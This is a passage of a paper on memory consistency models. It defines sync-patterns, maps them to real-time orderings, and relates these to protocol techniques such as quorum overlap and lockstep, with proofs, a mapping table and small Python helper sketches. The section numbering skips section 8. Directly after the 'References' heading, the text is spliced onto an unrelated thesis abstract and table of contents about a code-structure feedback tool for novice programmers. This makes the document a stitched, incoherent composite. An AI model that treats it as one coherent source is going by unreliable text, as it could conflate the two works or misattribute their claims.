Initially \( x = 0, y = 0 \)
\[
(a)\quad
\begin{array}{c|c}
P1 & P2 \\
\hline
a{:}\ Wx{=}1 & c{:}\ Wy{=}1 \\
b{:}\ Ry{=}0 & d{:}\ Rx{=}1 \\
\end{array}
\qquad
(b)\quad
\begin{array}{c|c}
P1 & P2 \\
\hline
a{:}\ Wx{=}1 & c{:}\ Ry{=}1 \\
b{:}\ Wy{=}1 & d{:}\ Rx{=}1 \\
\end{array}
\]
Figure 3: Four examples of sync-pats
Given an execution \( E(M, po, rf, hb, RL) \), we assert that \( E \) enforces \( s \) if there exists \( rl \in RL \) from which we can derive a \( syn \) such that:
\[\text{acyclic}(s \cup \text{syn})\]
In other words, a sync-pat that starts from operation \( a \) and ends on operation \( b \) is said to be enforced if \( (b, a) \notin syn \).
Figure 3 depicts four sync-pats to serve as examples. In the execution of Figure 3a, the sync-pat occurs between operations \( a \) and \( d \). In this instance, \( s \) is enforced because \( d \) returns the value created by \( a \). If \( d \) were to return 0, that would mean that there is a \( syn \) relation between \( d \) and \( a \) and thus \( s \) is not enforced.
Remarks. Note the following two remarks. First, we use \( \text{syn} \) rather than \( rl \) to test whether a sync-pat is enforced. This is because the sync-pat is a path between two operations to the same object, but \( rl \) is a total order of all operations across all objects. Second, note that a sync-pat must have at least one \( \text{po-type} \), because otherwise it would just be a composition of \( \text{syn-type} \) relations. Any such composition is a subset of \( \text{syn} \), which means that the execution enforces it by definition.
Consistency models. An MCM \( CM_i \) is defined by asserting that a set of sync-pats \( S_{CM} \) must be enforced. Plainly, an execution enforces \( CM_i \) iff it enforces every \( s \in S_{CM} \). As an example, assume that \( CM_i \) is defined through the four sync-pats depicted in Figure 3, which are formalized as follows:
\[
s_1 \triangleq po_{wr}; fr; po_{wr}, \quad s_2 \triangleq po_{ww}; rf; po_{rr}, \quad s_3 \triangleq po_{rw}; ws; po_{wr}, \quad s_4 \triangleq po_{rr}; syn_{rr}; po_{rw}.
\]
We define \( CM_i \) to be the following rule:
\[\text{acyclic}(s_1 \cup \text{syn}) \land \text{acyclic}(s_2 \cup \text{syn}) \land \text{acyclic}(s_3 \cup \text{syn}) \land \text{acyclic}(s_4 \cup \text{syn})\]
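Enforcement checks of this form reduce to building each sync-pat by relational composition and testing acyclicity of its union with syn. A sketch under the same set-of-pairs representation as before (our own helper names):

```python
def compose_path(relations):
    """Build a sync-pat s = r1; r2; ...; rk by relational composition."""
    path = set(relations[0])
    for r in relations[1:]:
        path = {(a, c) for (a, b) in path for (b2, c) in r if b == b2}
    return path

def acyclic_union(r1, r2):
    """acyclic(r1 ∪ r2): no element reaches itself in the transitive closure."""
    closure = set(r1) | set(r2)
    while True:
        extra = {(a, c) for (a, b) in closure for (b2, c) in closure if b == b2}
        if extra <= closure:
            break
        closure |= extra
    return all(a != b for (a, b) in closure)

def enforces_mcm(sync_pats, syn):
    """An execution enforces the MCM iff acyclic(s ∪ syn) for every sync-pat s."""
    return all(acyclic_union(s, syn) for s in sync_pats)
```

For the shape of Figure 3a, composing `{('a','b')}`, `{('b','c')}`, `{('c','d')}` yields `{('a','d')}`; adding `('d','a')` to syn creates a cycle and the check fails.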
5 From MCMs to rt-orderings
In this section, we provide a mapping from MCMs to rt-orderings. Specifically, given an MCM \( CM_i \) that is specified through a set \( S_{CM} \) of sync-pats, we automatically infer a set of rt-orderings sufficient to enforce \( CM_i \). In the rest of this section, we first differentiate between regular and irregular sync-pats (§5.1). Then we provide the mapping (§5.2), prove its correctness for an example sync-pat (§5.3), extend the proof to all regular sync-pats (§5.4) and finally extend the proof to irregular sync-pats (§5.5). In Table 3, we provide the mapping of 16 sync-pats to rt-orderings.
5.1 Regular and irregular sync-pats
We first categorize sync-pats into two classes: regular and irregular. A regular sync-pat 1) is composed of alternating \( \text{po-type} \) and \( \text{syn-type} \) relations and 2) starts and ends on a \( \text{po-type} \) relation. Thus, any regular sync-pat \( s \) is of the following form:
\[s \triangleq \text{po-type}; \text{syn-type}; \text{po-type}; \ldots \text{syn-type}; \text{po-type}\]
Any sync-pat that does not conform to regularity rules is irregular. The distinction between regular and irregular sync-pats will aid in the presentation of the mapping from sync-pats to rt-orderings. Specifically, we will first create a mapping from a regular sync-pat to the sufficient rt-orderings to enforce it. Then, in order to use the same mapping for irregular sync-pats, we will show that for every irregular sync-pat \( s_i \), there exists a regular sync-pat \( s_r \), such that enforcing \( s_r \) is sufficient to enforce \( s_i \).
5.2 The mapping
We assert the following three conditions to enforce any regular sync-pat \( s \), assuming that an operation can be of type \( m \) or \( n \) where \( m, n \in \{\text{read}, \text{write}\} \):
- **Cond-1**: For every \( \text{po-type} \) relation \( po_{mn} \) found in \( s \), the corresponding \( \text{prt-ordering} \) \( prt_{mn} \) must be enforced. Plainly, any \( \text{po-type} \) relation must also be an \( hb \) relation.
- **Cond-2**: For every \( \text{syn-type} \) relation \( syn_{mn} \), if it is not an \( rf \), the reverse \( \text{srt-ordering} \) \( srt_{nm} \) must be enforced.
- **Cond-3**: If the first operation in \( s \) is of type \( m \) and the last of type \( n \), the corresponding \( \text{srt-ordering} \) \( srt_{mn} \) must be enforced.
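The three conditions can be turned into a small procedure that, given a regular sync-pat described edge by edge, emits the rt-orderings it requires. This is our own rendering; each edge is a tuple `(type, m, n, is_rf)` with `m`, `n` in `{'w', 'r'}`:

```python
def required_orderings(edges):
    """edges: list of ('po'|'syn', m, n, is_rf) tuples describing a regular
    sync-pat. Returns the rt-orderings required by cond-1 (a prt-ordering
    for every po-type), cond-2 (the reverse srt-ordering for every non-rf
    syn-type) and cond-3 (the srt-ordering from first to last kind)."""
    required = set()
    for typ, m, n, is_rf in edges:
        if typ == 'po':
            required.add(f'prt_{m}{n}')        # cond-1
        elif not is_rf:
            required.add(f'srt_{n}{m}')        # cond-2: reverse ordering
    first, last = edges[0][1], edges[-1][2]
    required.add(f'srt_{first}{last}')         # cond-3
    return required
```

For \( s \triangleq po_{wr}; fr; po_{wr} \) the result is \( \{prt_{wr}, srt_{wr}\} \), matching the example worked out below.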
5.3 Proof for an example sync-pat
We start by proving that the three conditions are sufficient for the simple sync-pat portrayed in Figure 3a; then we extend the proof to any regular sync-pat. The simple sync-pat \( s \) is the following:
\[s \triangleq po_{wr}; fr; po_{wr} \]
For \( s \) the three conditions require the following rt-orderings:
- **Cond-1**: The \( prt_{wr} \) is required for both \( po_{wr} \) relations.
- **Cond-2**: The \( srt_{wr} \) for the \( fr \) relation (the reverse srt-ordering of a read-to-write pair).
- **Cond-3**: The \( srt_{wr} \), because \( s \) starts with a write and ends on a read.
We will show that for any execution $E(M, po, rf, hb, RL)$, if $prt_{wr}$ is enforced and there exists $rl \in RL$ such that $srt_{wr}$ is enforced then for the syn that is derived from that $rl$ it holds that $acyclic(s \cup syn)$.
To prove this, we first establish a new relation named $begins$-$before$-$completes$ ($bbc$). For two operations $a, b$ we assert that if $b$ does not complete before $a$ begins (i.e., $(b, a) \notin hb$), then $a$ begins before $b$ completes (i.e., $(a, b) \in bbc$). We establish the following rule:
$$\forall a, d \in M \text{ s.t. } (a, d) \in (hb; bbc; hb) \rightarrow (a, d) \in hb$$
We sketch a proof for this rule using Figure 4a, which illustrates the rule through four operations $(a, b, c, d)$, each associated with a timestamp $(t_a, t_b, t_c, t_d)$. Operation $b$ begins before $c$ completes (i.e., $(b, c) \in bbc$), while also $(a, b), (c, d) \in hb$. Therefore, $(a, d) \in (hb; bbc; hb)$. Since $a$ completes before $b$ begins ($t_a < t_b$) and $b$ begins before $c$ completes ($t_b < t_c$), it follows that $a$ completes before $c$ completes ($t_a < t_c$). Because $c$ completes before $d$ begins ($t_c < t_d$), it follows that $a$ completes before $d$ begins ($t_a < t_d$). Therefore, $(a, d) \in hb$.
Figure 4b illustrates the counter-example, where $c$ completes before $b$ begins; in this case it is possible for $d$ to begin before $a$ completes.
Consider an execution $E(M, po, rf, hb, RL)$, for which there exists an $rl \in RL$ such that all three conditions we asserted are satisfied. Assume four operations $a, b, c, d \in M$ such that $(a, b) \in po_{wr} \land (b, c) \in fr \land (c, d) \in po_{wr}$. This implies that $(a, d) \in s$. Let us now assume that $(a, d) \in (hb; bbc; hb)$ and thus $(a, d) \in hb$; specifically, $(a, d) \in hb_{wr}$. This is illustrated in Figure 4a. From cond-3 ($srt_{wr}$), we can assert that since $(a, d) \in hb_{wr}$, it follows that $(d, a) \notin syn$ and thus it must be that $acyclic(s \cup syn)$. Plainly, cond-3 ensures that $acyclic(s \cup syn)$ if the following condition holds:
$$\forall a, d \in M \text{ s.t. } (a, d) \in s \rightarrow (a, d) \in hb$$
Therefore it suffices to prove that cond-1 and cond-2 guarantee the above condition. We will do so by proving that $(a, d) \in (hb; bbc; hb)$.
Finally, cond-1 ($prt_{wr}$) mandates that $po_{wr} \subseteq hb_{wr}$. Therefore, $(a, b), (c, d) \in hb$. We need only prove that $(b, c) \in bbc$. Let us assume that $(b, c) \notin bbc$. It follows that $(c, b) \in hb$. Recall that $b$ is a read and $c$ is a write, so $(c, b) \in hb_{wr}$. Cond-2 mandates that $srt_{wr}$ is enforced: since $(c, b) \in hb_{wr}$, then $(b, c) \notin syn$. But $(b, c) \in fr \subseteq syn$; we have reached a contradiction, and therefore it must be that $(b, c) \in bbc$.
Figure 4b provides the counter-example where $(b, c) \notin bbc$. In this case it cannot be that $(a, d) \in s$, because $(c, b) \in hb$ and therefore from cond-2 it follows that $(b, c) \notin syn$. Plainly, the sync-pat $s$ will not occur here because $P1$’s read to $y$ will observe $P2$’s write to $y$.
As we have shown above, from cond-1 and cond-2 it follows that $(a, d) \in hb$, and thus from cond-3 it follows that $(d, a) \notin syn$. Therefore the three conditions are sufficient to enforce $s$.
5.4 Extending to all regular sync-pats
Note the intuition behind the three conditions. Cond-1 ensures that every $po-type$ relation of the sync-pat is also an $hb$ relation. Similarly, cond-2 ensures that every $syn-type$ relation is also a $bbc$ relation. As a regular sync-pat is composed of alternating $po-type$ and $syn-type$ relations, enforcing cond-1 and cond-2 ensures that the sync-pat can be expressed as a composition of alternating $hb$ and $bbc$ relations.
As we saw $hb; bbc; hb \subseteq hb$. By induction we can extend this rule for any sequence of alternating $hb$ and $bbc$ relations. Specifically:
$$\forall a, b \in M \text{ s.t. } (a, b) \in hb; bbc; hb; \ldots; bbc; hb \rightarrow (a, b) \in hb$$
Therefore, cond-1 and cond-2 ensure that if $(a, b) \in s$ then $(a, b) \in hb$ for any regular sync-pat $s$. Finally, cond-3 ensures that the sync-pat is enforced, by ensuring that if $(a, b) \in hb$ then $(b, a) \notin syn$. This means that our three conditions can be used to enforce any regular sync-pat.
Examples – Table 3. Table 3 depicts the sufficient rt-orderings for 16 sync-pats. Specifically, each cell represents a distinct sync-pat between operations $a, b, c, d$. For instance, the highlighted cell where $a = Wx, b = Ry, c = Wy, d = Rx$, corresponds to the sync-pat of Figure 3a.
Cond-2 exception: rf. Recall that cond-2 is not required for $rf$ edges. This is because the purpose of cond-2 is to ensure that the $syn-type$ relation is also a $bbc$ relation. However, this is implied by the $rf$ as it is impossible for a read $r$ to read-from a write $w$ if $r$ completes before $w$ begins. Plainly:
$$\forall w, r \in M \text{ s.t. } (w, r) \in rf \rightarrow (w, r) \in bbc$$
Producer-consumer (Figure 1a). Let $s_{pc}$ be the producer-consumer sync-pat of Figure 1a (discussed in the Introduction). We assert that $s_{pc} \triangleq po_{ww}; rf; po_{rr}$. To enforce $s_{pc}$, cond-1 requires the prt-orderings $prt_{ww}$ and $prt_{rr}$, cond-2 does not require any srt-ordering because the only $syn-type$ is an $rf$, and cond-3 requires the $srt_{wr}$.
5.5 Extending to irregular sync-pats
A sync-pat is deemed irregular if 1) it has consecutive \textit{po-type} relations or 2) it has consecutive \textit{syn-type} relations or 3) it does not start with a \textit{po-type} relation (i.e., starts with a \textit{syn-type}) or 4) it does not end with a \textit{po-type} relation (i.e., ends with a \textit{syn-type}). For each such sync-pat \( s \), we derive a sync-pat \( s' \) such that 1) \( s' \) is regular and 2) if \( s' \) is enforced then \( s \) must also be enforced.
Table 3: The mapping of 16 sync-pats to rt-orderings. Each cell represents a sync-pat of the form \( s \triangleq po\text{-type}; syn\text{-type}; po\text{-type} \), where the first po-type includes \((a, b)\), the syn-type includes \((b, c)\) and the second po-type includes \((c, d)\). The highlighted cell corresponds to Figure 3a.
\[
\begin{array}{|c|c|c|c|c|}
\hline
 & c{:}\,Wy,\ d{:}\,Wx & c{:}\,Wy,\ d{:}\,Rx & c{:}\,Ry,\ d{:}\,Wx & c{:}\,Ry,\ d{:}\,Rx \\
\hline
a{:}\,Wx,\ b{:}\,Wy & srt_{ww},\ prt_{ww} & srt_{ww},\ srt_{wr},\ prt_{ww},\ prt_{wr} & srt_{ww},\ srt_{rw},\ prt_{ww},\ prt_{rw} & srt_{wr},\ srt_{rw},\ prt_{ww},\ prt_{rr} \\
\hline
a{:}\,Wx,\ b{:}\,Ry & srt_{ww},\ srt_{wr},\ prt_{ww},\ prt_{wr} & \mathbf{srt_{wr},\ prt_{wr}} & srt_{ww},\ srt_{rr},\ prt_{wr},\ prt_{rw} & srt_{wr},\ srt_{rr},\ prt_{wr},\ prt_{rr} \\
\hline
a{:}\,Rx,\ b{:}\,Wy & srt_{ww},\ srt_{rw},\ prt_{ww},\ prt_{rw} & srt_{ww},\ srt_{rr},\ prt_{wr},\ prt_{rw} & srt_{rw},\ prt_{rw} & srt_{rw},\ srt_{rr},\ prt_{rw},\ prt_{rr} \\
\hline
a{:}\,Rx,\ b{:}\,Ry & srt_{wr},\ srt_{rw},\ prt_{ww},\ prt_{rr} & srt_{wr},\ srt_{rr},\ prt_{wr},\ prt_{rr} & srt_{rr},\ srt_{rw},\ prt_{rr},\ prt_{rw} & srt_{rr},\ prt_{rr} \\
\hline
\end{array}
\]
\textbf{Consecutive po-type.} We start with sync-pats that have consecutive \textit{po-type} relations. We use the insight that any composition of \textit{po-type} relations must be a subset of one of the \( po_{ww}, po_{wr}, po_{rr}, po_{rw} \) relations. For instance, \( po_{wr}; po_{rr} \) is a subset of \( po_{wr} \). Therefore, for any \( s \) that has consecutive \textit{po-type} relations, we derive an \( s' \) which replaces them with a single \textit{po-type} relation, such that \( s \subseteq s' \), and we assert that enforcing \( s' \) is sufficient to also enforce \( s \). For instance, from \( s \triangleq po_{wr}; po_{rr}; fr; po_{ww} \) we derive \( s' \triangleq po_{wr}; fr; po_{ww} \).
\textbf{Start on syn-type.} If \( s \) starts on a \textit{syn-type} relation, we remove it to derive \( s' \). Assume now that \( (a, c) \in s \), \( (b, c) \in s' \) and \( (a, b) \in fr \). Let us now prove that if \( s' \) is enforced, \( s \) is enforced too. Assume \( s' \) is enforced but \( s \) is not. Therefore, \( (c, b) \notin syn \) but \( (c, a) \in syn \). We know that \( (a, b) \in fr \) and thus \( (a, b) \in syn \). By the transitivity property of \( syn \), since \( (c, a) \in syn \land (a, b) \in syn \), it must be that \( (c, b) \in syn \). This contradicts our assumption that \( s' \) is enforced. Therefore enforcing \( s' \) is sufficient to also enforce \( s \).
\textbf{End on syn-type.} Similarly, if \( s \) ends on a \textit{syn-type} relation, we remove it to derive \( s' \). Assume now that \( (a, c) \in s \), \( (a, b) \in s' \) and \( (b, c) \in fr \). Using the same proof as above, we can infer that if \( s' \) is enforced then \( (b, a) \notin syn \) and thus it follows that \( (c, a) \notin syn \). Therefore enforcing \( s' \) is sufficient to also enforce \( s \).
\textbf{A combination of the above (IRIW – Figure 1b).} When a sync-pat falls into more than one of the above irregular categories, we combine the techniques discussed above. For instance, let \( s_{iriw} \) be the IRIW sync-pat of Figure 1b (discussed in the Introduction). This is an irregular sync-pat, which both starts with a \textit{syn-type} relation and includes a composition of consecutive \textit{syn-type} relations. We use the rules above to derive \( s'_{iriw} \triangleq po_{rr}; syn_{rr}; po_{rr} \) and assert that if \( s'_{iriw} \) is enforced then \( s_{iriw} \) is also enforced. To enforce \( s'_{iriw} \), cond-1 requires the prt-ordering \( prt_{rr} \) and cond-2 requires the srt-ordering \( srt_{rr} \), which is also required by cond-3.
6 From rt-orderings to MCMs
So far we have created a mapping from MCMs to rt-orderings, by establishing the sufficient rt-orderings to enforce any sync-pat. In this section, we use this result to obtain the reverse mapping from rt-orderings to MCMs, focusing our discussion solely on regular sync-pats, seeing as the enforcement of irregular sync-pats is done by mapping them to regular ones. To obtain the mapping from rt-orderings to sync-pats, we reverse each of the three conditions, assuming that an operation can be of type \( m \) or \( n \) where \( m, n \in \{\text{read, write}\} \). Specifically, given a protocol that enforces a set of prt-orderings \( R_p \) and a set of srt-orderings \( R_s \), a sync-pat \( s \) is enforced when it abides by the following conditions:
- **Cond-1’:** \( s \) can include a \textit{po-type} relation \( po_{mn} \) if \( prt_{mn} \in R_p \).
- **Cond-2’:** \( s \) can include a \textit{syn-type} relation \( syn_{mn} \) other than \( rf \) if \( srt_{nm} \in R_s \); an \( rf \) can always be included.
- **Cond-3’:** \( s \) can start on an operation of type \( m \) and end on an operation of type \( n \) if \( srt_{mn} \in R_s \).
Example. To showcase how these conditions can be used in practice, let us specify the MCM $CM_i$ that is enforced by a protocol that enforces the rt-orderings $prt_{ww}, prt_{wr}, srt_{rw}$ and $srt_{wr}$. To do so we must specify a set of sync-pats $S_{CM}$, where each regular sync-pat $s \in S_{CM}$ abides by the following rules:
- Any po-type relation in $s$ is either a $po_{ww}$ or a $po_{wr}$
- Any syn-type relation in $s$ is either a $syn_{wr}$ or an $fr$ ($rf$ is included in $syn_{wr}$)
- $s$ must either start on a write and end on a read, or start on a read and end on a write.
Notably, the interplay amongst the rules can be used to further simplify them. For instance, the third rule asserts that from the available srt-orderings ($srt_{rw}$ and $srt_{wr}$) it follows that either the first operation must be a read and the last a write, or the reverse. However, neither of the available po-types ($po_{ww}$ and $po_{wr}$) starts with a read, and since a regular sync-pat must start with a po-type relation, it cannot be that the first operation is a read. Consequently, the first operation can only be a write, and thus the last operation must be a read, to abide by the third rule.
Similarly, because a regular sync-pat is a composition of alternating po-type and syn-type relations, it follows that the available po-type and syn-type relations can only be used if they can synergize. For instance, the $syn_{wr}$ cannot be used at all, because it must be followed by a po-type relation and neither of the available po-types ($po_{ww}$ and $po_{wr}$) starts from a read. Similarly, because the $syn_{wr}$ cannot be used, the $po_{ww}$ cannot be used before any syn-type, nor can it be used as the last relation because the sync-pat must end on a read.
Therefore the rules for a sync-pat $s \in S_{CM}$ are simplified as follows:
- Any po-type relation in $s$ must be a $po_{wr}$
- Any syn-type relation in $s$ must be an $fr$
- $s$ must start on a write and end on a read.
As a result, any regular sync-pat $s \in S_{CM}$ is a composition of alternating $po_{wr}$ and $fr$ relations. Below we list a few example sync-pats in $S_{CM}$:
\[
\begin{align*}
s_1 & \triangleq po_{wr}; fr; po_{wr} \\
s_2 & \triangleq po_{wr}; fr; po_{wr}; fr; po_{wr} \\
s_3 & \triangleq po_{wr}; fr; po_{wr}; \ldots; fr; po_{wr}
\end{align*}
\]
Notably, the $prt_{ww}$ and $srt_{rw}$ do not contribute towards enforcing any $s \in S_{CM}$.
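The reverse conditions likewise admit a mechanical check: given the sets of prt- and srt-orderings a protocol enforces, decide whether a regular sync-pat (described edge by edge, in the same tuple format as before) is guaranteed to be enforced. A sketch with our own names:

```python
def pat_enforced(edges, prt, srt):
    """edges: list of ('po'|'syn', m, n, is_rf) tuples; prt and srt are the
    sets of rt-orderings (e.g. {'prt_wr'}) enforced by the protocol.
    The sync-pat is enforced if every po-type has its prt-ordering (cond-1'),
    every non-rf syn-type has its reverse srt-ordering (cond-2') and the
    srt-ordering between the first and last operation kinds is enforced (cond-3')."""
    for typ, m, n, is_rf in edges:
        if typ == 'po' and f'prt_{m}{n}' not in prt:
            return False                      # cond-1' violated
        if typ == 'syn' and not is_rf and f'srt_{n}{m}' not in srt:
            return False                      # cond-2' violated
    first, last = edges[0][1], edges[-1][2]
    return f'srt_{first}{last}' in srt        # cond-3'
```

For a protocol enforcing, e.g., prt_ww, prt_wr, srt_rw and srt_wr, a pat of alternating po_wr and fr edges passes all three conditions, while any pat containing a po_rr fails cond-1'.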
7 From rt-orderings to Protocols
In previous sections we established the mappings between the sync-pats and the rt-orderings. In this section, we relate rt-orderings to some well-known protocol design techniques. We start with a brief discussion on the prt-orderings and then we focus on the srt-orderings.
7.1 Enforcing rt-orderings
Prt-orderings model the operation of the ROB specifying when the memory system can begin executing an operation. Upholding the prt-orderings is as simple as inspecting the state of the ROB. For instance, enforcing $prt_{wr}$ implies that the memory system cannot begin executing a read $r$ from process $p$, until every preceding write in the ROB is completed.
Srt-orderings model how the memory system executes reads and writes. Below we discuss two common techniques that can be used to enforce srt-orderings: 1) overlap and 2) lockstep.
Overlap. The srt-ordering $srt_{mn}$ can be enforced simply by ensuring that operations of type $m$ must overlap with operations of type $n$ in a physical location. For instance, we can enforce $srt_{wr}$, by ensuring that a write is propagated to $x$ nodes and a read queries $y$ nodes, where $x + y > N$ and $N$ is the number of nodes. Alternatively, both types of operations can “meet” in some centralized physical location (e.g., the directory for multiprocessors). To ensure all four srt-orderings and thus linearizability, both reads and writes must query $y$ nodes to learn about completed operations and must broadcast their results to $x$ nodes. This is exactly how the multi-writer variant of ABD [14] operates.
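The overlap condition $x + y > N$ is the usual quorum-intersection argument. The sketch below is a heavily simplified, single-threaded caricature of an ABD-style register (our own names; the real protocol additionally has readers broadcast back the value they return, as noted above):

```python
class Replica:
    """One memory-system node storing a (timestamp, value) pair for the object."""
    def __init__(self):
        self.ts, self.val = 0, None

def write(replicas, write_quorum, value):
    """Propagate the write to x = write_quorum nodes with a fresh timestamp."""
    ts = max(r.ts for r in replicas) + 1       # simplified timestamp choice
    for r in replicas[:write_quorum]:
        r.ts, r.val = ts, value

def read(replicas, read_quorum):
    """Query y = read_quorum nodes; x + y > N guarantees at least one queried
    node overlaps every completed write, so the freshest value is observed."""
    queried = replicas[-read_quorum:]          # any y nodes intersect the write quorum
    freshest = max(queried, key=lambda r: r.ts)
    return freshest.val
```

With N = 3, x = 2 and y = 2, the quorums always intersect: querying the last two nodes still observes a write applied to the first two.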
Lockstep. Lockstep is a technique, where a memory system node first “grabs a lock” on the object before beginning an operation and releases it when the operation completes. Upon grabbing the lock, the node learns about the operation executed by the previous lock holder. The act of “grabbing the lock” is similar to getting a cache-line in $M$ or $S$ state in a coherence protocol [17], or becoming the leader of the next log entry in a state machine replication protocol, such as Paxos [11]. Notably, lockstep entails overlap as operations must meet in a physical location to exchange the lock, but it also precludes the operations from executing concurrently.
There are two aspects of lockstep that can enforce srt-orderings. First, the srt-ordering between two operations is enforced if a lock must be passed from one to the other. For example, we can enforce $srt_{ww}$ by mandating that a lock must be grabbed to perform a write. Second, locking also ensures that certain operations cannot overlap in real-time. When a write cannot overlap with a write and $srt_{ww}$ is enforced, then $srt_{rw}$ is also enforced. This is because if a read $r$ returns the value of write $w$, then a write $k$ that begins after $r$ has completed must also begin after $w$ has completed. Similarly, when a write cannot overlap with a read and $srt_{wr}$ is enforced, then $srt_{rr}$ is enforced. This is because if a read $r$ returns the value of write $w$, then it must be that $w$ completes before $r$ begins. Therefore, a read $m$ that begins after $r$ has completed must also begin after $w$ has completed and thus will observe $w$. Protocols often combine the two aspects of lockstep to enforce the single-writer multiple-reader invariant (SWMR) [17], where for any given object at any given time there is either a single write in progress or multiple reads. This ensures that writes must grab a lock from each other ($srt_{ww}$), reads must grab a lock from writes ($srt_{wr}$), writes cannot overlap in time ($srt_{rw}$) and writes do not overlap in time with reads ($srt_{rr}$).
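A minimal caricature of lockstep (our own sketch, not a protocol from the literature): a per-object lock held from an operation's begin to its completion, so same-object operations exchange the lock and never overlap:

```python
import threading

class LockstepObject:
    """Per-object lock: an operation begins only after grabbing the lock and
    completes before releasing it, so same-object operations never overlap."""
    def __init__(self, value=None):
        self._lock = threading.Lock()
        self.value = value
        self.last_op = None          # what the next lock holder learns

    def do_write(self, value):
        with self._lock:             # grab the lock; the previous holder's
            self.value = value       # result is visible in value/last_op
            self.last_op = ('W', value)

    def do_read(self):
        with self._lock:
            self.last_op = ('R', self.value)
            return self.value
```

Because the lock serializes all same-object operations in real time, this toy version enforces all four srt-orderings for the object; SWMR relaxes it by letting readers share the lock.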
7.2 Srt-orderings for compositionality
So far we have viewed the srt-orderings solely as a mathematical model of the protocol. However, in distributed systems, it is often necessary to describe the real-time guarantees offered by a system, in order to compose different systems. Consider the example of Zookeeper. Zookeeper does not offer linearizability, and thus multiple Zookeeper instances cannot be composed. However, researchers have found that Zookeeper does offer some real-time guarantees that can be leveraged to achieve compositionality [12].
Srt-orderings can be used to capture these real-time guarantees. For example, the precise real-time guarantees of Zookeeper are the \( srt_{ww} \) and the \( srt_{rw} \) srt-orderings, rather than all four srt-orderings. More importantly, given this knowledge, we can specify the MCM provided by composing different Zookeeper instances: the composed system will enforce the same rt-orderings as a single Zookeeper instance, and thus we can use the reverse mapping from rt-orderings to sync-pats to specify the resulting MCM. In fact, we can use srt-orderings in the same spirit to specify the MCM of any combination of composed systems, by asserting that the composed system will enforce any rt-ordering that is enforced by all of its subsystems.
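The composition rule at the end of the paragraph is a plain intersection over the subsystems' enforced rt-orderings; sketched below with our own names:

```python
def composed_orderings(subsystems):
    """The composed system enforces exactly the rt-orderings enforced by
    every one of its subsystems (intersection of their ordering sets)."""
    orderings = set(subsystems[0])
    for s in subsystems[1:]:
        orderings &= set(s)
    return orderings
```

Two instances with identical ordering sets compose to that same set, and adding a fully linearizable subsystem (all four srt-orderings) does not strengthen the composition beyond the weakest member.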
9 Related Work
This work is the first to provide a mapping from MCMs to the protocols that can enforce them. To present this mapping we have used an abstract system model and the formalism presented by Alglave et al. [2] to describe MCMs, executions and real-time guarantees. Several works [4–6, 13, 20] have also described similar system models and formalisms, but differ from our work in that they do not provide a mapping from MCMs to protocols. Specifically, Szekeres and Zhang [20] provide a system model and a formalism called result visibility to describe consistency guarantees, including real-time guarantees. Crooks et al. [5], focusing on databases, provide a state-based formalization of isolation guarantees. Burckhardt, in his book on Eventual Consistency [4], provides a formalism to describe consistency models and protocols, with a focus on weaker guarantees. Lev-ari et al. [13] define Ordered Sequential Consistency, OSC(A), in order to specify the real-time guarantees of a protocol (with a focus on Zookeeper [9]). Similarly, Gotsman and Burckhardt propose GSC [6], a generic operational model for systems that totally order all writes, which can capture all of the srt-orderings for such systems.
In the cache coherence literature, the four program-orderings are used to describe consistency guarantees [17]. In fact, researchers have shown that when the coherence protocol enforces the single-writer multiple-reader (SWMR) invariant, the MCM depends solely on the enforced program orderings [3, 16]. Program orderings are very similar to prt-orderings with the subtle difference that program orderings carry the implication that the memory system enforces SWMR. In contrast, prt-orderings make no such assumption, allowing us to explore all possible behaviours of the memory system.
Finally, CCICheck [15] provides a way to verify an existing coherence protocol against its target MCM using the notion of \( \mu \)hb orderings, which are related to real-time. Our work...
provides a mapping from MCMs to protocols, enabling the design of minimal protocols for any MCM.
10 Conclusion
In this work, we took an important step towards actualizing our overarching vision: automating the design of the protocols that enforce the consistency model (MCM) in shared memory systems. Specifically, we argued for the need for an intermediate abstraction between the MCM and the protocol implementation, which allows us to map the MCM to specific protocol implementation techniques. We proposed such an abstraction by mathematically modelling the protocol through eight rt-orderings. To do so, we observed that any such protocol is composed of two gadgets: the ROB and the memory system. We mathematically abstracted the ROB with the four prt-orderings and the memory system with the four srt-orderings. Crucially, we created a mapping from consistency guarantees to the rt-orderings, such that any MCM can be translated into the minimal set of rt-orderings that are required to enforce it. Finally, we completed the picture by relating the rt-orderings to protocol implementation techniques, paving the way for automating protocol design.
Acknowledgments
We would like to thank the anonymous reviewers for their valuable comments and Dan Sorin for the insightful discussions and valuable feedback. This work was supported in part by EPSRC grant EP/L01503X/1 to The University of Edinburgh and ARM through its PhD Scholarship Program.
References
ADDRESSING NOVICE CODING PATTERNS: EVALUATING AND IMPROVING A TOOL FOR CODE ANALYSIS AND FEEDBACK
Jacquelyn MacHardy Anderson (Dr. Eliane Stampfer Wiese)
School of Computing
ABSTRACT
Successful software needs maintenance over long periods of time. The original code needs to solve the problem and be maintainable. Computer science instructors at universities try to teach students in introductory classes how to write code that meets these goals, but results are inconsistent. Readability is an important aspect of maintainability, and writing readable code requires choosing and structuring statements and expressions in a way that is idiomatic. Instructors of advanced CS courses perceive that their students frequently don't possess, or don't engage, this skill of writing with good structure. Building and evaluating this skill is complicated. Could students benefit from a tool that can identify and flag poor code structure and provide hints or suggestions on how to improve it while they program? Can a batch-processing version of the same tool help instructors quickly see and address the gaps in their students' understanding? These questions were investigated through think-alouds with ten students as they coded in Eclipse using PMD, a code structure analysis tool, and through interviews with four professors who teach introductory computer science courses.
In the think-alouds, students did produce novice code structures, and the tool performed as intended in flagging these structures and providing feedback. All students were able to correctly interpret the tool’s feedback to successfully revise at least one of their initial implementations to use expert code structure. However, there is room for improvement in the tool’s feedback.
The instructor interview results showed that although instructors believe that these patterns are important for students to learn and use, assessing and giving feedback on this aspect of student code by hand does not scale well to large class sizes, so their current grading and feedback processes do not target these kinds of code structures. Instructors believe these tools have the potential to address some of these gaps and challenges. Although no instructors want to interface with the output of the batch-processing tool the way it is currently presented, all of them were interested in seeing it extended and provided input on how the tools could be extended to better meet their needs.
# TABLE OF CONTENTS
ABSTRACT .................................................................................................................. iii
LIST OF FIGURES .................................................................................................. vii
ACKNOWLEDGMENTS ............................................................................................... viii
INTRODUCTION ....................................................................................................... 1
BACKGROUND AND RELATED WORK .................................................................. 4
RESEARCH QUESTIONS .......................................................................................... 6
THINK-ALOUD METHODS ..................................................................................... 7
Participants ............................................................................................................. 7
Methods .................................................................................................................. 7
THINK-ALOUD RESULTS ....................................................................................... 9
Tool Effectiveness .................................................................................................. 10
Students Produced Patterns the Tool Should Flag and the Tool Flagged Them Correctly ................................................................ 10
Students’ Interpretations and Implementations of the Tool’s Feedback ........ 11
